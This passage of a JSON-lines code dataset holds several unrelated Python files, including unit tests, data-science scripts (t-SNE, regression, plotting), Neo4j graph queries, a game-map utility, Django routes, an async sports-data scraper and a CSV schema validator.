args.query_param_token,\n args.hmac_key_id,\n args.hmac_key,\n args.additional_metadata\n )\n make_request(js, args.dss_url, args.key_file)\n","sub_path":"scripts/subscription-create.py","file_name":"subscription-create.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158243040","text":"import shutil\nimport tempfile\n\nimport mock\nfrom testify import TestCase, setup, teardown\nfrom testify import assert_equal, run\nfrom tests.assertions import assert_call, assert_length\nfrom tests.testingutils import Turtle, autospec_method\n\nfrom tron import mcp\nfrom tron.config import config_parse\nfrom tron.serialize.runstate import statemanager\n\n\nclass MasterControlProgramTestCase(TestCase):\n\n TEST_CONFIG = 'tests/data/test_config.yaml'\n\n @setup\n def setup_mcp(self):\n self.working_dir = tempfile.mkdtemp()\n self.config_path = tempfile.mkdtemp()\n self.mcp = mcp.MasterControlProgram(\n self.working_dir, self.config_path)\n self.mcp.state_watcher = mock.create_autospec(\n statemanager.StateChangeWatcher)\n\n @teardown\n def teardown_mcp(self):\n self.mcp.nodes.clear()\n self.mcp.event_manager.clear()\n shutil.rmtree(self.config_path)\n shutil.rmtree(self.working_dir)\n\n def test_reconfigure(self):\n autospec_method(self.mcp._load_config)\n self.mcp.state_watcher = mock.MagicMock()\n self.mcp.reconfigure()\n self.mcp._load_config.assert_called_with(reconfigure=True)\n self.mcp.state_watcher.disabled.assert_called_with()\n\n def test_ssh_options_from_config(self):\n ssh_conf = mock.Mock(agent=False, identities=[])\n ssh_options = self.mcp._ssh_options_from_config(ssh_conf)\n\n assert_equal(ssh_options['agent'], False)\n assert_equal(ssh_options.identitys, [])\n # TODO: tests with agent and identities\n\n def test_graceful_shutdown(self):\n self.mcp.graceful_shutdown()\n for job_sched in self.mcp.get_jobs():\n assert job_sched.shutdown_requested\n\n def test_apply_config(self):\n config_container = mock.create_autospec(config_parse.ConfigContainer)\n master_config = config_container.get_master.return_value\n autospec_method(self.mcp._ssh_options_from_config)\n self.mcp.apply_config(config_container)\n self.mcp.state_watcher.update_from_config.assert_called_with(\n master_config.state_persistence)\n assert_equal(self.mcp.output_stream_dir, master_config.output_stream_dir)\n assert_equal(self.mcp.time_zone, master_config.time_zone)\n assert_equal(self.mcp.context.base, master_config.command_context)\n self.mcp._ssh_options_from_config.assert_called_with(\n master_config.ssh_options)\n\n def test_update_state_watcher_config_changed(self):\n self.mcp.state_watcher.update_from_config.return_value = True\n self.mcp.jobs = {'a': mock.Mock(), 'b': mock.Mock()}\n self.mcp.services = {'c': mock.Mock(), 'd': mock.Mock()}\n state_config = mock.Mock()\n self.mcp.update_state_watcher_config(state_config)\n self.mcp.state_watcher.update_from_config.assert_called_with(state_config)\n assert_equal(\n self.mcp.state_watcher.save_job.mock_calls,\n [mock.call(j.job) for j in self.mcp.jobs.itervalues()])\n assert_equal(\n self.mcp.state_watcher.save_service.mock_calls,\n [mock.call(s) for s in self.mcp.services.itervalues()])\n\n def test_update_state_watcher_config_no_change(self):\n self.mcp.state_watcher.update_from_config.return_value = False\n self.mcp.jobs = {'a': mock.Mock(), 'b': mock.Mock()}\n state_config = mock.Mock()\n self.mcp.update_state_watcher_config(state_config)\n assert not self.mcp.state_watcher.save_job.mock_calls\n\n\nclass MasterControlProgramRestoreStateTestCase(TestCase):\n\n @setup\n def setup_mcp(self):\n self.working_dir = tempfile.mkdtemp()\n self.config_file = tempfile.NamedTemporaryFile(\n dir=self.working_dir)\n self.mcp = mcp.MasterControlProgram(\n self.working_dir, self.config_file.name)\n self.mcp.jobs = {'1': Turtle(), '2': Turtle()}\n self.mcp.services = {'1': Turtle(), '2': Turtle()}\n\n @teardown\n def teardown_mcp(self):\n self.mcp.nodes.clear()\n self.mcp.event_manager.clear()\n shutil.rmtree(self.working_dir)\n\n def test_restore_state(self):\n def restore(jobs, services):\n state_data = {'1': 'things', '2': 'things'}\n return state_data, state_data\n self.mcp.state_watcher = Turtle(restore=restore)\n self.mcp.restore_state()\n for job in self.mcp.jobs.values():\n assert_call(job.restore_job_state, 0, 'things')\n for service in self.mcp.services.values():\n assert_call(service.restore_service_state, 0, 'things')\n\n def test_restore_state_no_state(self):\n def restore(jobs, services):\n return {}, {}\n self.mcp.state_watcher = Turtle(restore=restore)\n self.mcp.restore_state()\n for job in self.mcp.jobs.values():\n assert_length(job.restore_job_state.calls, 0)\n for service in self.mcp.services.values():\n assert_length(service.restore_service_state.calls, 0)\n\n def test_restore_state_partial(self):\n def restore(jobs, services):\n return {'1': 'thing'}, {'2': 'thing'}\n self.mcp.state_watcher = Turtle(restore=restore)\n self.mcp.restore_state()\n\n assert_call(self.mcp.jobs['1'].restore_job_state, 0, 'thing')\n assert_length(self.mcp.jobs['2'].restore_job_state.calls, 0)\n assert_length(self.mcp.services['1'].restore_service_state.calls, 0)\n assert_call(self.mcp.services['2'].restore_service_state, 0, 'thing')\n\nif __name__ == '__main__':\n run()\n","sub_path":"tests/mcp_test.py","file_name":"mcp_test.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"531110698","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nimageMatrix = np.fromfile('image2.bin', dtype=np.int16)\nn \t\t\t= int(np.sqrt(imageMatrix.size))\nim \t\t\t= plt.imshow(imageMatrix.reshape((n,n)), origin='lower')\nim.set_clim([0.0,200.0])\nim.set_cmap('afmhot')\nim.axes.get_xaxis().set_visible(False)\nim.axes.get_yaxis().set_visible(False)\nplt.savefig('contest_image.eps', format='eps', dpi=500)\n#plt.show()\n\n","sub_path":"assignment4/ArtContest/art.py","file_name":"art.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"638679966","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 19 09:45:13 2019\n\n@author: mgbriere\n\"\"\"\nimport sys,os,py2neo,csv\nimport numpy as np\nfrom py2neo import *\n\nID = 'neo4j'\npwd = '4jneo'\n\ngraph = Graph(\"bolt://localhost:7687\",auth=(ID, pwd))\n\n#clustering = louvain or markov\n# for the given rel_name, returns 2 values :\n # mean closeness for louvain (or markov) clusters\n # mean closeness with nb_support used by louvain (or markov) but before clustering (all patients)\ndef get_mean_centrality(cancer, rel_name, clustering):\n rel = \"[r:\" + rel_name + \"]\"\n if clustering == \"louvain\":\n cluster_nodes = \"(c:Community:\" + rel_name + \")\"\n clust_relation = \"[:FROM_COMMUNITY]\"\n elif clustering == \"markov\":\n cluster_nodes = \"(c:MarkovClust:\" + rel_name + \")\"\n clust_relation = \"[:FROM_MARKOV_CL]\"\n\n avg_clustering_centrality_query = \"MATCH \" + cluster_nodes + \" RETURN avg(c.avgClosenessCentrality)\"\n avg_clustering_centrality = float(graph.run(avg_clustering_centrality_query).to_series())\n \n nb_support_query = \"MATCH \" + cluster_nodes + \" RETURN DISTINCT c.nb_support\"\n nb_support = int(graph.run(nb_support_query).to_series())\n print(nb_support)\n avg_clustering_centrality_before_clust = get_closeness_before_clust(cancer, rel_name, nb_support)\n return(avg_clustering_centrality, avg_clustering_centrality_before_clust)\n \ndef get_closeness_before_clust(cancer, rel_name, nb_support):\n patients_nodes = \"(p:Patient:\" + cancer + \")\"\n p1_node = \"(p1:Patient:\" + cancer + \")\"\n p2_node = \"(p2:Patient:\" + cancer + \")\"\n rel = \"[r:\" + rel_name + \"]\"\n rel_condition = \"r.nb_support >=\" + str(nb_support)\n \n objects = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN distinct id(p1) as id'\n condition = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN id(p1) as source, id(p2) as target'\n \n closeness_query = \"CALL algo.closeness('\" + objects + \"', '\" + condition + \"',\\\n {graph:'cypher', write: true, writeProperty: 'tot_closeness_centrality'})\"\n graph.run(closeness_query)\n \n avg_closeness_query = 'MATCH ' + patients_nodes + '-' + rel + '-(p2) WHERE ' + rel_condition + ' RETURN avg(p.tot_closeness_centrality)'\n avg_closeness = float(graph.run(avg_closeness_query).to_series())\n \n return(avg_closeness)\n \ndef get_mean_clust_coeff(cancer, rel_name, clustering):\n rel = \"[r:\" + rel_name + \"]\"\n if clustering == \"louvain\":\n cluster_nodes = \"(c:Community:\" + rel_name + \")\"\n clust_relation = \"[:FROM_COMMUNITY]\"\n elif clustering == \"markov\":\n cluster_nodes = \"(c:MarkovClust:\" + rel_name + \")\"\n clust_relation = \"[:FROM_MARKOV_CL]\"\n\n avg_clust_coeff_query = \"MATCH \" + cluster_nodes + \" RETURN avg(c.avgClustCoeff)\"\n avg_clust_coeff = float(graph.run(avg_clust_coeff_query).to_series())\n \n nb_support_query = \"MATCH \" + cluster_nodes + \" RETURN DISTINCT c.nb_support\"\n nb_support = int(graph.run(nb_support_query).to_series())\n print(nb_support)\n avg_clust_coeff_before_clust = get_clust_coeff_before_clust(cancer, rel_name, nb_support)\n return(avg_clust_coeff, avg_clust_coeff_before_clust)\n\ndef get_clust_coeff_before_clust(cancer, rel_name, nb_support):\n patients_nodes = \"(p:Patient:\" + cancer + \")\"\n p1_node = \"(p1:Patient:\" + cancer + \")\"\n p2_node = \"(p2:Patient:\" + cancer + \")\"\n rel = \"[r:\" + rel_name + \"]\"\n rel_condition = \"r.nb_support >=\" + str(nb_support)\n \n objects = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN distinct id(p1) as id'\n condition = 'MATCH ' + p1_node + '-' + rel + '-' + p2_node + ' WHERE ' + rel_condition + ' RETURN id(p1) as source, id(p2) as target'\n \n triangle_count_query = \"CALL algo.triangleCount('\" + objects + \"', '\" + condition + \"',\\\n {graph:'cypher', concurrency:4, write:true, writeProperty:'tot_triangles', clusteringCoefficientProperty:'tot_coefficient'}) \\\n YIELD loadMillis, computeMillis, writeMillis, nodeCount, triangleCount, averageClusteringCoefficient \\\n RETURN averageClusteringCoefficient\"\n avg_clust_coeff = float(graph.run(triangle_count_query).to_series())\n \n return(avg_clust_coeff)\n\n\n\n","sub_path":"dev/Neomics_Gala/graph_analysis/small_world_communities.py","file_name":"small_world_communities.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"102353916","text":"import numpy as np\nfrom timitate.utils.const import NEUTRAL_MINERAL_SET\nfrom timitate.utils.const import NEUTRAL_VESPENE_SET\n\n\nRESOURCE_DISTANCE = 7.0\n\ndef calculate_distances(x1, y1, x2, y2):\n x = abs(x1 - x2)\n y = abs(y1 - y2)\n distance = x ** 2 + y ** 2\n return distance ** 0.5\n\ndef unit_dist(unit1, unit2):\n return calculate_distances(unit1.pos.x, unit1.pos.y,\n unit2.pos.x, unit2.pos.y)\n\ndef min_dist(unit, mtags, gtags, all_minerals, all_gas):\n # minimal dist from unit to mtags and gtags\n d = [unit_dist(unit, all_minerals[tag]) for tag in mtags] + \\\n [unit_dist(unit, all_gas[tag]) for tag in gtags]\n return min(d)\n\ndef can_build_base(x, y, m_pos):\n for pos in m_pos:\n dx = abs(pos[0] - x)\n dy = abs(pos[1] - y)\n if dx < 6 and dy < 6 and (dx < 5 or dy < 5):\n return False\n return True\n\ndef find_ideal_base_position(m_pos, g_pos):\n mean_x, mean_y = m_pos.mean(0)\n max_x, max_y = g_pos.min(0) + 10\n min_x, min_y = g_pos.max(0) - 10\n d_min = None\n ideal_pos = []\n x = min_x\n while x <= max_x:\n y = min_y\n while y <= max_y:\n if can_build_base(x, y, m_pos):\n d = calculate_distances(x, y, mean_x, mean_y)\n if d_min is None or d < d_min:\n ideal_pos = [x, y]\n d_min = d\n y += 1\n x += 1\n return ideal_pos\n\ndef find_resource_area(mtags, gtags, all_minerals, all_gas):\n gtags_in_area = []\n tag = mtags.pop()\n mtags_in_area = [tag]\n while mtags: # not empty\n d_min = None\n mtag = None\n for tag in mtags:\n d = min_dist(all_minerals[tag], mtags_in_area,\n gtags_in_area, all_minerals, all_gas)\n if d_min is None or d < d_min:\n d_min = d\n mtag = tag\n if d_min > RESOURCE_DISTANCE:\n break\n mtags_in_area.append(mtag)\n mtags.discard(mtag)\n\n while gtags: # not empty\n d_min = None\n gtag = None\n for tag in gtags:\n d = min_dist(all_gas[tag], mtags_in_area,\n gtags_in_area, all_minerals, all_gas)\n if d_min is None or d < d_min:\n d_min = d\n gtag = tag\n if d_min > RESOURCE_DISTANCE:\n break\n gtags_in_area.append(gtag)\n gtags.discard(gtag)\n\n m_pos = [[all_minerals[tag].pos.x,\n all_minerals[tag].pos.y] for tag in mtags_in_area]\n g_pos = [[all_gas[tag].pos.x,\n all_gas[tag].pos.y] for tag in gtags_in_area]\n ideal_pos = find_ideal_base_position(np.array(m_pos),\n np.array(g_pos))\n return ideal_pos\n\ndef find_all_base_position(units):\n all_minerals = dict([(u.tag, u) for u in units\n if u.unit_type in NEUTRAL_MINERAL_SET])\n all_vespenes = dict([(u.tag, u) for u in units\n if u.unit_type in NEUTRAL_VESPENE_SET])\n mtags = set(all_minerals.keys())\n gtags = set(all_vespenes.keys())\n all_pos = []\n while len(mtags) > 0 and len(gtags) > 0:\n pos = find_resource_area(mtags, gtags, all_minerals, all_vespenes)\n all_pos.append(pos)\n return all_pos\n\n","sub_path":"agent_TLeagueFormal14/TImitate/timitate/utils/find_ideal_base_pos.py","file_name":"find_ideal_base_pos.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"402932402","text":"from cmath import e\nfrom typing import Union\nimport pandas as pd\nimport os\n\n\n\nclass Item:\n # NOTE: these are class attrs\n pay_rate = 0.8 # discount\n inventory = list()\n fpath = os.path.join(os.getcwd(), 'OOP_projects', 'data', 'items.csv')\n\n @staticmethod\n def validate_input(name: str, price: float, quantity: float) -> Union[bool, AssertionError]:\n assert price >=0 and quantity>=0, 'Price and quantity should be >= 0'\n\n @staticmethod\n def check_if_integer(num):\n \n # if float\n if isinstance(num, float):\n # if 7.0 it will return True, False if has fractional part\n return num.is_integer()\n # if int like 7\n elif isinstance(num, int):\n return True\n return False\n\n\n def __repr__(self) -> str:\n \"\"\"\n Display a single Item object\n \"\"\"\n # repr should be st it can be directly copied and used to create objs\n return f\"Item('{self.name}',{self.price},{self.quantity})\"\n\n def add_item_to_inventory(item):\n \"\"\"\n Add an item to the class attr inventory if not exists\n \"\"\"\n if item not in Item.inventory:\n Item.inventory.append(item)\n\n return\n\n def display_inventory():\n \"\"\"\n Displays each item in the inventory\n \"\"\"\n for item_ in Item.inventory:\n print (item_)\n return\n\n def __init__(self, name: str, price: float, quantity=0) -> None:\n\n Item.validate_input(name, price, quantity)\n\n self.name = name\n self.price = price\n self.quantity = quantity\n\n # add item to inventory now that it is created \n Item.add_item_to_inventory(self)\n\n def calculate_total_price(self) -> float:\n return self.price * self.quantity\n\n def apply_discount(self):\n self.price = self.price * self.pay_rate\n print (f'After Discount of {100-self.pay_rate*100}% price: {self.price}')\n\n \n\n # NOTE: this is a class method\n @classmethod\n def instantiate_from_csv(cls):\n \"\"\"\n Read a csv file and create instances for each record\n \"\"\"\n fpath = cls.fpath\n try:\n df = pd.read_csv(fpath, index_col=False)\n except FileNotFoundError as e:\n print (f'Not found file at {fpath}')\n raise\n\n records = df.to_dict(orient='list')\n\n for item_ in (list(zip(records['name'], records['price'], records['quantity']))):\n Item(name=item_[0], price=item_[1], quantity=item_[2])\n\n\n# item1 = Item(\"Phone\", 100, 1)\n# item2 = Item(\"Laptop\", 1000, 3)\n# item3 = Item(\"Cable\", 10, 5)\n# item4 = Item(\"Mouse\", 50, 5)\n# item5 = Item(\"Keyboard\", 75, 5)\n\n# Item.display_inventory()\n\nItem.instantiate_from_csv()\nprint(Item.inventory)\nItem.display_inventory()\n\n\nprint (Item.check_if_integer(9))","sub_path":"OOP_projects/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"322821729","text":"from sqlalchemy import func\n\nfrom dao.db import OracleDb\nfrom dao.orm.model import ormSchedule\n\n\nclass UserHelper:\n\n def __init__(self):\n self.db = OracleDb()\n\n def getVariable(self, group_name=None):\n\n if group_name:\n group_name = \"'{0}'\".format(group_name)\n else:\n group_name = 'null'\n\n query = \"select * from table(ORM_COUNT.GetCountData({0}))\".format(group_name)\n print(query)\n result = self.db.execute(query)\n return result.fetchall()\n\n\n\n def test(self):\n db = OracleDb()\n query1 = (\n db.sqlalchemy_session.query(\n ormSchedule.group_name,\n func.count(ormSchedule.group_name).label('skill_count')\n ). \\\n\n group_by(ormSchedule.group_name)\n ).all()\n print(query1)\n\n\n\n\nif __name__ == \"__main__\":\n\n helper = UserHelper()\n print(helper.getVariable('KM-63'))\n print(helper.test())","sub_path":"km-63/Канєвський/source/dao/myhelper.py","file_name":"myhelper.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614373340","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/16 下午9:44\n# @Author : wonderstone\n# @FileName: deck_app.py\n# @Software: PyCharm\n# @Ref :\n\n\nfrom frenchdeck import FrenchDeck, Card\n\nbeer_card = Card('7', 'diamonds')\nprint(beer_card)\ndeck = FrenchDeck()\nprint(len(deck))\n # 52\n # deck[:3]\n # [Card(rank='2', suit='spades'), Card(rank='3', suit='spades'), Card(rank='4', suit='spades')]\n # >> > deck[12::13]\n # [Card(rank='A', suit='spades'), Card(rank='A', suit='diamonds'), Card(rank='A', suit='clubs'),\n # Card(rank='A', suit='hearts')]\n # >> > Card('Q', 'hearts') in deck\n # True\n # >> > Card('Z', 'clubs') in deck\n # False\n # >> > for card in deck: # doctest: +ELLIPSIS\n # ...\n # print(card)\n # Card(rank='2', suit='spades')\n # Card(rank='3', suit='spades')\n # Card(rank='4', suit='spades')\n # ...\n # >> > for card in reversed(deck): # doctest: +ELLIPSIS\n # ...\n # print(card)\n # Card(rank='A', suit='hearts')\n # Card(rank='K', suit='hearts')\n # Card(rank='Q', suit='hearts')\n # ...\n # >> > for n, card in enumerate(deck, 1): # doctest: +ELLIPSIS\n # ...\n # print(n, card)\n # 1\n # Card(rank='2', suit='spades')\n # 2\n # Card(rank='3', suit='spades')\n # 3\n # Card(rank='4', suit='spades')\n # ...\n # suit_values = dict(spades=3, hearts=2, diamonds=1, clubs=0)\n #\n #\n # def spades_high(card):\n # ...\n # rank_value = FrenchDeck.ranks.index(card.rank)\n #\n #\n # ...\n # return rank_value * len(suit_values) + suit_values[card.suit]\n #\n # Rank\n # test:\n #\n # >> > spades_high(Card('2', 'clubs'))\n # 0\n # >> > spades_high(Card('A', 'spades'))\n # 51\n #\n # >> > for card in sorted(deck, key=spades_high): # doctest: +ELLIPSIS\n # ...\n # print(card)\n # Card(rank='2', suit='clubs')\n # Card(rank='2', suit='diamonds')\n # Card(rank='2', suit='hearts')\n # ...\n # Card(rank='A', suit='diamonds')\n # Card(rank='A', suit='hearts')\n # Card(rank='A', suit='spades')","sub_path":"deck_app.py","file_name":"deck_app.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217054561","text":"from Tkinter import *\n\nmaster = Tk()\n\nLabel(text=\"one\").pack()\n\nseparator = Frame(height=2, bd=1, relief=SUNKEN)\nseparator.pack(fill=X, padx=5, pady=5)\n\nLabel(text=\"two\").pack()\n\nmainloop()","sub_path":"Tkinter/separator.py","file_name":"separator.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"140385476","text":"\"\"\" File containing TSNE class \"\"\"\nimport numpy as np\nfrom numpy.random import normal\nimport matplotlib.pyplot as plt\n\nfrom src import util\n\n\nclass TSNE:\n \"\"\" Class for performing Student t-Distributed Stochastic Neighbor Embedding \"\"\"\n def __init__(self, filename):\n self.filename = filename\n self.raw = util.load_csv_to_array(filename)\n self.nr_data_points = self.raw.shape[0]\n self.hd_similarity_matrix = None # p as described in assignment\n\n def compute_pairwise_similarities(self, k):\n \"\"\"\n Computes pairwise similarities between the raw data points.\n Creates a new matrix filled with zeroes, except for at the\n indexes of the k+1 nearest points in the distance matrix, where\n the value is set to 1. Diagonal is then set to zero\n (in other words distance from point to itself is not included).\n\n Sets the hd_similarity_matrix of self to be the resulting matrix.\n \"\"\"\n self.hd_similarity_matrix = util.calculate_euclidean_distances(self.raw)\n self.hd_similarity_matrix = util.reduce_matrix(self.hd_similarity_matrix, k)\n\n self.hd_similarity_matrix = \\\n (self.hd_similarity_matrix + np.swapaxes(self.hd_similarity_matrix, 0, 1) > 0)\\\n .astype(float)\n\n def map_data_points(self, max_iteration, alpha, epsilon):\n \"\"\" Maps data points. \"\"\"\n\n # divide each point by sum of values\n stand_hd_similarity_matrix = self.hd_similarity_matrix / \\\n np.sum(self.hd_similarity_matrix) # P\n dynamic_stand_hd_similarity_matrix = 4 * stand_hd_similarity_matrix\n\n # Sample 2D data points from normal distribution\n sampled_two_d_points = normal(0, 10e-4, (2, self.nr_data_points))\n util.save_array_to_csv(sampled_two_d_points, \"sampled_2d_points.csv\")\n\n # Or load previously sampled 2D points for consistency\n sampled_two_d_points = util.load_csv_to_array(\"sampled_2d_points.csv\")\n\n # Initialize variables\n gain = np.ones((2, self.nr_data_points)) # g in assignment\n change = np.zeros((2, self.nr_data_points)) # delta in assignment\n dynamic_alpha = 0.5\n\n for i in range(1, max_iteration):\n print(\"Iteration \" + str(i))\n\n if i == 250:\n dynamic_alpha = alpha # Optimisation trick\n\n # Find similarity matrix of 2D points\n two_d_similarity_matrix = util.calculate_euclidean_distances(\n np.swapaxes(sampled_two_d_points, 0, 1))\n two_d_similarity_matrix = 1 / (\n 1 + np.square(two_d_similarity_matrix)) # q as described in assignment\n\n # divide each point by sum of values\n stand_two_d_similarity_matrix = two_d_similarity_matrix / \\\n np.sum(two_d_similarity_matrix) # Q\n\n if i == 100:\n dynamic_stand_hd_similarity_matrix = \\\n stand_hd_similarity_matrix # Optimisation trick\n\n capital_y = np.swapaxes(sampled_two_d_points, 0, 1)\n capital_g = (dynamic_stand_hd_similarity_matrix -\n stand_two_d_similarity_matrix) * two_d_similarity_matrix\n capital_s = np.diag(np.sum(capital_g, axis=1))\n gradient = 4 * (capital_s - capital_g) @ capital_y\n\n # print(gradient.shape)\n gradient = np.swapaxes(gradient, 0, 1)\n\n # Update gain\n gain[np.sign(gradient) != np.sign(change)] += 0.2\n gain[np.sign(gradient) == np.sign(change)] *= 0.8\n gain[gain < 0.01] = 0.01\n\n # Update change\n change = dynamic_alpha * change - epsilon * gain * gradient\n\n # Update 2D points\n sampled_two_d_points += change\n\n print(sampled_two_d_points)\n\n # Plotting mapped points\n if self.filename == \"digits.csv\":\n labels = util.load_csv_to_array(\"digits_label.csv\").tolist()\n points_to_plot = np.swapaxes(sampled_two_d_points, 0, 1)\n plt.scatter(points_to_plot[:, 0], points_to_plot[:, 1],\n c=labels, cmap='tab10', s=10, marker=\".\")\n cbar = plt.colorbar()\n cbar.set_label(\"Number labels\")\n else:\n plt.scatter(sampled_two_d_points[:, 0], sampled_two_d_points[:, 1],\n s=10, marker=\".\")\n plt.show()\n","sub_path":"src/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"130057866","text":"# Import Packages\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\n\nbmi = pd.read_csv('Datasets/BMI.csv')\n\nmodel = LinearRegression()\nmodel.fit(bmi[['BMI']], bmi[['Life expectancy']])\n\npredict_life = model.predict([[21.07931]])\nprint(predict_life)","sub_path":"59_DSND/02_Linear_Regression_Scikit.py","file_name":"02_Linear_Regression_Scikit.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"332063511","text":"from django.conf.urls import url\r\nfrom first_app import views\r\n\r\nurlpatterns=[\r\n url(r'^book_appointments/',views.book,name='book'),\r\n url(r'^show_appointments/',views.showapp,name='showapp'),\r\n url(r'^booked/',views.bookapp,name='bookapp'),\r\n url(r'^$',views.index,name='index'),\r\n\r\n\r\n]","sub_path":"first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374504159","text":"from django.conf.urls import url\nfrom . import views\n\n\napp_name = 'weather'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^baoshan/(\\w+)$', views.baoshan, name='baoshan'),\n url(r'^changning/(\\w+)$', views.changning, name='changning'),\n url(r'^chongming/(\\w+)$', views.chongming, name='chongming'),\n url(r'^fengxian/(\\w+)$', views.fengxian, name='fengxian'),\n url(r'^hongkou/(\\w+)$', views.hongkou, name='hongkou'),\n url(r'^huangpu/(\\w+)$', views.huangpu, name='huangpu'),\n url(r'^jiading/(\\w+)$', views.jiading, name='jiading'),\n url(r'^jinshan/(\\w+)$', views.jinshan, name='jinshan'),\n url(r'^jinan/(\\w+)$', views.jinan, name='jinan'),\n url(r'^minghang/(\\w+)$', views.minghang, name='minghang'),\n url(r'^pudong/(\\w+)$', views.pudong, name='pudong'),\n url(r'^nanhui/(\\w+)$', views.nanhui, name='nanhui'),\n url(r'^qingpu/(\\w+)$', views.qingpu, name='qingpu'),\n url(r'^songjiang/(\\w+)$', views.songjiang, name='songjiang'),\n url(r'^xuhui/(\\w+)$', views.xuhui, name='xuhui'),\n url(r'^yangpu/(\\w+)$', views.yangpu, name='yangpu'),\n\n]","sub_path":"weather/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"460309702","text":"import aiohttp\nimport asyncio\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36',\n }\n\n\ndef analysis_html(response):\n data_dict = {}\n html_string = response.decode('utf-8')\n dumps_list = html_string.lstrip('\\ufeff').strip().split('var')\n for dumps in dumps_list:\n dump = dumps.strip().rstrip(';')\n dump_list = dump.split('=', 1)\n if len(dump_list) < 2:\n continue\n # print(dump_list[0].strip(), dump_list[1].strip())\n data_dict[dump_list[0].strip()] = eval(dump_list[1].strip())\n return data_dict\n\n\nasync def get(key, value, semaphore):\n \"\"\"\n 定义一个异步get请求方法\n :param url:\n :param func:\n :return:\n \"\"\"\n async with semaphore:\n async with aiohttp.ClientSession() as session:\n async with session.get(url='http://bdata.7m.com.cn/analyse/gb/js/' + str(value) + '.js', headers=headers) as response:\n if str(response.status).startswith('2'):\n data_dict = analysis_html(await response.read())\n a_mn = data_dict.get('a_mn', '')\n a_mcl = data_dict.get('a_mcl', '')\n a_mid = data_dict.get('a_mid', '')\n return (key, {'Id': a_mid, 'Name': a_mn, 'ShortName': key, 'Color': a_mcl})\n return None\n\n\nasync def main(competition_name_dict):\n \"\"\"\n 定义一个异步的总调度方法\n :return:\n \"\"\"\n tasks = []\n semaphore = asyncio.Semaphore(500) # 限制并发量为500\n for key, value in competition_name_dict.items():\n task = asyncio.ensure_future(get(key, value, semaphore))\n tasks.append(task)\n dones, pendings = await asyncio.wait(tasks)\n dones_dict = dict([task.result() for task in dones if task.result()])\n return dones_dict\n\n\ndef get_b_competition(competition_name_dict):\n # 执行请求\n loop = asyncio.get_event_loop()\n task = asyncio.ensure_future(main(competition_name_dict))\n loop.run_until_complete(task)\n return task.result()\n\n\n\n","sub_path":"scrapy_7m/tool/basketball_tool/aio_b_competition.py","file_name":"aio_b_competition.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"519037489","text":"import io\nimport sys\nimport csv\nimport jsonschema\nimport json\nimport datetime\nimport logging\n\n\n# Util function for fixing case, python str.title() is not that good!\ndef titleCase(st):\n return ' '.join(''.join([w[0].upper(), w[1:].lower()]) for w in st.split())\n\n\n# See encoding note beow\ndef fixEncoding(st):\n return st.replace('Â', '')\n\n\n# Transform and convert the row into a form suitable for validation\n# Note two transforms being applied: titleCase and fixEncoding\n# The latter occurs in a field which is currently non-critical\n# So its a quick and dirty attempt at fixing - not ideal\n# as it looks like an upstream encoding problem that needs fixing\ndef map(row):\n logging.debug('Entering map(row)')\n return {\n \"camis\": int(row[0]),\n \"dba\": titleCase(row[1]),\n \"boro\": titleCase(row[2]),\n \"building\": titleCase(row[3]),\n \"street\": titleCase(row[4]),\n \"zipcode\": row[5],\n \"phone\": row[6],\n \"cuisine_description\": titleCase(row[7]),\n \"inspection_date\": row[8],\n \"action\": row[9],\n \"violation_code\": row[10],\n \"violation_description\": fixEncoding(row[11]),\n \"critical_flag\": row[12],\n \"score\": row[13],\n \"grade\": row[14],\n \"grade_date\": row[15],\n \"record_date\": row[16],\n \"inspection_type\": row[17]\n }\n\n\n# Use Json Schema to validate the payload\ndef get_schema_validator():\n logging.info('Entering validate(json_row)')\n with open('schema/restaurant.json') as schema_file:\n in_schema = json.load(schema_file)\n return jsonschema.Draft4Validator(in_schema)\n\n\nvalidator = 